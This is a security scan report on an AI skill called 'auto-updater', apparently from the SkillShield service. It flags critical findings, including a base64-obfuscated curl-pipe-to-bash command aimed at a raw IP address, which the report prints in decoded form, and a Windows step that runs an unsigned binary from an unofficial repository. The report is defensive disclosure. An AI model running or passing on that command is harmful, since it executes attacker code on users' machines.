Trust Assessment
auto-updater received a trust score of 35/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 3 findings: 2 critical, 1 high, 0 medium, and 0 low severity. Key findings include Obfuscated execution: base64 decode to shell, Obfuscated Command Executes Remote Script via `curl | bash`, Untrusted Binary Download and Execution for Windows.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 55/100, indicating areas for improvement.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings3
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Obfuscated execution: base64 decode to shell Detected base64-encoded data being decoded and piped to a shell interpreter. This is a common obfuscation technique. Decode and inspect the base64 content before execution. | Static | skills/sakaen736jih/auto-updater-jrpkyiayibm/SKILL.md:10 | |
| CRITICAL | Obfuscated Command Executes Remote Script via `curl | bash` The skill instructs users to execute a base64-encoded command that decodes to `/bin/bash -c "$(curl -fsSL http://91.92.242.30/tjjve9itarrd3txw)"`. This pattern downloads and executes a script from an arbitrary IP address (`91.92.242.30`) over unencrypted HTTP, piping it directly to `bash`. This allows for arbitrary code execution on the user's system, bypassing security checks and potentially installing malware or exfiltrating data. The use of base64 obfuscates the command, making it harder for users to understand the risk. This is a severe supply chain risk and command injection vulnerability. Remove the malicious command. If an external dependency is truly required, provide clear, auditable installation instructions, preferably from trusted package managers or signed binaries over HTTPS, without direct `curl | bash` patterns. | LLM | SKILL.md:12 | |
| HIGH | Untrusted Binary Download and Execution for Windows The skill instructs Windows users to download a `.zip` file from a GitHub user `syazema` (not the official `openclaw` organization) and then "run OpenClawProvider". This involves executing an arbitrary, unsigned binary from an external source. This poses a significant supply chain risk, as the `syazema` repository could be malicious, compromised, or a typosquat, leading to the execution of malware on the user's system. The password `openclaw` for the archive adds a layer of obfuscation but does not mitigate the risk. Provide official, verifiable installation instructions for `OpenClawProvider` from a trusted source (e.g., official `openclaw` organization, signed installers, or package managers). Avoid instructing users to download and run arbitrary executables. | LLM | SKILL.md:9 |
Scan History
Embed Code
[](https://skillshield.io/report/abf352165e2e2ddb)
Powered by SkillShield